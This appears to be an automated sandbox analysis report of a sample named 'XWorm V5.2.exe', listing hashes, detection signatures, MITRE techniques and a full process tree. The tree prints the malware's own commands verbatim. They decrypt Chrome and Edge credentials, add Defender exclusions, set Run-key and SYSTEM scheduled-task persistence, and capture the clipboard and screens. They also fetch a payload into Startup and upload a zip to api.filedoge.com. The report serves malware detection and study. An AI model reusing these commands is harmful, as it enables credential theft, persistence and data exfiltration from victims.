Analysis
-
max time kernel
34s -
max time network
46s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64 arch:x86 image:win10v2004-20240802-en locale:en-us os:windows10-2004-x64 system -
submitted
09/09/2024, 15:51
Static task
static1
Behavioral task
behavioral1
Sample
XWorm V5.2.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
XWorm V5.2.exe
Resource
win10v2004-20240802-en
General
-
Target
XWorm V5.2.exe
-
Size
37.7MB
-
MD5
4d2fe88411ca382a705f7de70505f8ee
-
SHA1
992be069e1123ea68a414ce462f2b7a0e5c39563
-
SHA256
1180b5ce40dfeadc5843448e0f163408aa33f23abe39030d5eecaf37fc17d551
-
SHA512
8df4399dc43b854fd72764b426146044799aaea80a07dbecf4d28941b957af1b480ade452fd020912c37b54280a057f02be19c10812f59ab3b8f2d45c0a82b43
-
SSDEEP
786432:V3on1HvSzxAMNwFZArYsHPv697OZYV797:VYn1HvSpNwXmvYJX
Malware Config
Signatures
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell and hide display window.
pid | Process
2816 | powershell.exe
1300 | powershell.exe
4020 | powershell.exe
944 | powershell.exe
3540 | powershell.exe
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation | XWorm V5.2.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation | cscript.exe
-
Clipboard Data 1 TTPs 1 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid | Process
1840 | cmd.exe
-
Loads dropped DLL 1 IoCs
pid | Process
4976 | XWorm V5.2.exe
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Local\\Temp\\fLViPrCntulUySs.ps1\"" | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Local\\Temp\\XWorm V5.2.exe" | reg.exe
-
Hide Artifacts: Hidden Window 1 TTPs 1 IoCs
Windows that would typically be displayed when an application carries out an operation can be hidden.
pid | Process
1840 | cmd.exe
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
7 | api.ipify.org
-
An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
pid | Process
4012 | cmd.exe
3576 | cmd.exe
-
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid | Process
400 | tasklist.exe
4328 | tasklist.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Detects videocard installed 1 TTPs 2 IoCs
Uses WMIC.exe to determine videocard installed.
pid | Process
1792 | WMIC.exe
2700 | WMIC.exe
-
Modifies registry key 1 TTPs 2 IoCs
pid | Process
4428 | reg.exe
1164 | reg.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
4388 | schtasks.exe
-
Suspicious behavior: EnumeratesProcesses 22 IoCs
pid | Process
944 | powershell.exe
944 | powershell.exe
4952 | powershell.exe
4952 | powershell.exe
1932 | powershell.exe
1932 | powershell.exe
2816 | powershell.exe
2816 | powershell.exe
2816 | powershell.exe
1300 | powershell.exe
1300 | powershell.exe
1300 | powershell.exe
4020 | powershell.exe
4020 | powershell.exe
4020 | powershell.exe
4328 | powershell.exe
4328 | powershell.exe
4328 | powershell.exe
3608 | powershell.exe
3608 | powershell.exe
3540 | powershell.exe
3540 | powershell.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"1⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4976 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"2⤵
- Suspicious use of WriteProcessMemory
PID:428 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "3⤵PID:5068
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -noprofile -3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:944 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nh1y3ziu\nh1y3ziu.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:4876 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7FBF.tmp" "c:\Users\Admin\AppData\Local\Temp\nh1y3ziu\CSC74DE58826678436387CF4891271BA99.TMP"5⤵PID:4476
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵
- Suspicious use of WriteProcessMemory
PID:3476 -
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:952
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵
- Suspicious use of WriteProcessMemory
PID:5084 -
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:400
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵
- Suspicious use of WriteProcessMemory
PID:3600 -
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4328
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,57,87,11,87,254,65,110,77,188,204,169,16,188,62,171,189,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,254,33,137,177,235,50,182,20,81,71,143,26,227,205,89,196,240,80,196,222,21,156,80,97,105,113,161,9,98,115,51,158,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,43,8,25,245,219,66,165,39,134,60,176,136,236,243,209,73,137,143,250,180,241,246,190,236,128,2,126,40,240,229,10,145,48,0,0,0,156,243,29,117,250,184,13,93,102,181,9,212,190,202,73,37,247,246,190,19,121,110,7,4,155,70,87,154,232,235,107,223,181,174,244,140,209,239,140,6,5,187,215,220,105,18,21,103,64,0,0,0,4,74,51,195,112,34,198,233,219,135,56,111,144,11,66,229,181,196,164,135,1,247,222,63,169,213,206,118,61,188,8,69,213,132,2,178,108,186,120,244,105,96,50,170,73,23,190,214,136,13,64,247,198,47,14,253,143,253,117,42,80,1,6,248), $null, 'CurrentUser')"2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:4012 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,57,87,11,87,254,65,110,77,188,204,169,16,188,62,171,189,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,254,33,137,177,235,50,182,20,81,71,143,26,227,205,89,196,240,80,196,222,21,156,80,97,105,113,161,9,98,115,51,158,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,43,8,25,245,219,66,165,39,134,60,176,136,236,243,209,73,137,143,250,180,241,246,190,236,128,2,126,40,240,229,10,145,48,0,0,0,156,243,29,117,250,184,13,93,102,181,9,212,190,202,73,37,247,246,190,19,121,110,7,4,155,70,87,154,232,235,107,223,181,174,244,140,209,239,140,6,5,187,215,220,105,18,21,103,64,0,0,0,4,74,51,195,112,34,198,233,219,135,56,111,144,11,66,229,181,196,164,135,1,247,222,63,169,213,206,118,61,188,8,69,213,132,2,178,108,186,120,244,105,96,50,170,73,23,190,214,136,13,64,247,198,47,14,253,143,253,117,42,80,1,6,248), $null, 'CurrentUser')3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4952
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,57,87,11,87,254,65,110,77,188,204,169,16,188,62,171,189,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,189,235,105,13,230,226,179,234,164,7,77,240,115,231,147,216,38,56,133,37,36,206,37,38,201,19,140,48,232,238,106,184,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,118,170,236,162,75,92,79,39,145,94,82,140,167,251,65,199,8,143,133,113,29,80,221,31,248,166,34,62,97,129,50,100,48,0,0,0,46,137,80,237,156,67,148,47,73,90,97,33,70,249,185,197,89,27,227,86,185,150,42,24,240,243,166,244,41,217,138,208,204,27,38,38,110,64,50,108,188,191,119,211,255,232,40,188,64,0,0,0,41,143,84,6,127,25,219,124,207,140,89,129,98,187,233,102,232,113,181,71,95,6,121,220,0,124,241,59,121,6,17,73,184,105,105,153,107,23,51,31,29,92,33,56,43,160,205,172,173,161,221,201,12,38,71,198,248,147,146,131,103,213,208,194), $null, 'CurrentUser')"2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:3576 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,57,87,11,87,254,65,110,77,188,204,169,16,188,62,171,189,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,189,235,105,13,230,226,179,234,164,7,77,240,115,231,147,216,38,56,133,37,36,206,37,38,201,19,140,48,232,238,106,184,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,118,170,236,162,75,92,79,39,145,94,82,140,167,251,65,199,8,143,133,113,29,80,221,31,248,166,34,62,97,129,50,100,48,0,0,0,46,137,80,237,156,67,148,47,73,90,97,33,70,249,185,197,89,27,227,86,185,150,42,24,240,243,166,244,41,217,138,208,204,27,38,38,110,64,50,108,188,191,119,211,255,232,40,188,64,0,0,0,41,143,84,6,127,25,219,124,207,140,89,129,98,187,233,102,232,113,181,71,95,6,121,220,0,124,241,59,121,6,17,73,184,105,105,153,107,23,51,31,29,92,33,56,43,160,205,172,173,161,221,201,12,38,71,198,248,147,146,131,103,213,208,194), $null, 'CurrentUser')3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1932
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"2⤵
- Suspicious use of WriteProcessMemory
PID:3996 -
C:\Windows\System32\Wbem\WMIC.exewmic diskdrive get serialnumber3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4372
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"2⤵PID:3792
-
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f3⤵PID:1412
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"2⤵
- Suspicious use of WriteProcessMemory
PID:4380 -
C:\Windows\system32\schtasks.exeschtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM3⤵
- Scheduled Task/Job: Scheduled Task
PID:4388
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""2⤵
- Clipboard Data
- Hide Artifacts: Hidden Window
- Suspicious use of WriteProcessMemory
PID:1840 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"3⤵
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2816 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\avrlft3j\avrlft3j.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:3912 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES881C.tmp" "c:\Users\Admin\AppData\Local\Temp\avrlft3j\CSC87C3F6CE2B134931B8302F8ACD14F9C4.TMP"5⤵PID:4536
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""2⤵
- Suspicious use of WriteProcessMemory
PID:4524 -
C:\Windows\system32\cscript.execscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3112 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:1944 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1300
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4020
-
-
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe" /f5⤵
- Adds Run key to start application
- Modifies registry key
PID:4428
-
-
C:\Windows\system32\reg.exereg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"5⤵
- Modifies registry key
PID:1164
-
-
C:\Windows\system32\curl.execurl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE5⤵PID:2024
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"2⤵
- Suspicious use of WriteProcessMemory
PID:412 -
C:\Windows\System32\Wbem\WMIC.exewmic baseboard get serialnumber3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1904
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"2⤵
- Suspicious use of WriteProcessMemory
PID:1920 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_computersystemproduct get uuid3⤵PID:524
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"2⤵PID:4324
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Description,PNPDeviceID3⤵PID:2996
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"2⤵PID:2264
-
C:\Windows\System32\Wbem\WMIC.exewmic memorychip get serialnumber3⤵PID:2400
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"2⤵PID:1924
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid3⤵PID:2480
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"2⤵PID:1232
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get processorid3⤵PID:1424
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "getmac /NH"2⤵PID:1764
-
C:\Windows\system32\getmac.exegetmac /NH3⤵PID:220
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:3396
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:4200
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:4404
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:5044
-
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:732
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:2156
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:1792
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:4376
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4328
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:5092
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:3628
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:2084
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:1904
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:2364
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:4892
-
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:524
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:3196
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:2700
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:1332
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3608
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:4100
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:3088
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1""2⤵PID:1476
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3540
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Erhqjvyq.zip";"2⤵PID:2416
-
C:\Windows\system32\curl.execurl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Erhqjvyq.zip";3⤵PID:4212
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
- Command and Scripting Interpreter (1)
- PowerShell (1)
- Scheduled Task/Job (1)
- Scheduled Task (1)
Persistence
- Boot or Logon Autostart Execution (1)
- Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1)
- Scheduled Task (1)
Privilege Escalation
- Boot or Logon Autostart Execution (1)
- Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1)
- Scheduled Task (1)
Downloads
SHA18d640d0d0b2500f1cd67aa34eb8d2025fe33888b
SHA2562bea76129bd83facb5032b97712b9a9bb04501917590c50dd6907a12cd3c0cc1
SHA51282679dd92db3ef01c92a6469fa67ba27c518680cf28077bc80c958a44515f49f197bac00faa35f581a77632617352b6ab835e1bf4caeb353e14062d7857c06fb
-
Filesize
3KB
MD52e3a163ddfbaa533e0be56122b61e7a4
SHA12d86febbd74f6d0094c979288ea95436bf921fe9
SHA25671a8977f2d3bd102cfb1fece03068b841aad21e582e08034fe89de406cbfb70f
SHA51238a4751c87a478b1358f97e2d63a56be1ed70e2a495ef8ea108bbb4826ca70f7168e6aee43e6d526c241ca8cfa0c7cb8e8442d565dfb0fed5e61f118fb4ecbc9
-
C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node
Filesize 1.8MB
MD5 66a65322c9d362a23cf3d3f7735d5430
SHA1 ed59f3e4b0b16b759b866ef7293d26a1512b952e
SHA256 f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c
SHA512 0a44d12852fc4c74658a49f886c4bc7c715c48a7cb5a3dcf40c9f1d305ca991dd2c2cb3d0b5fd070b307a8f331938c5213188cbb2d27d47737cc1c4f34a1ea21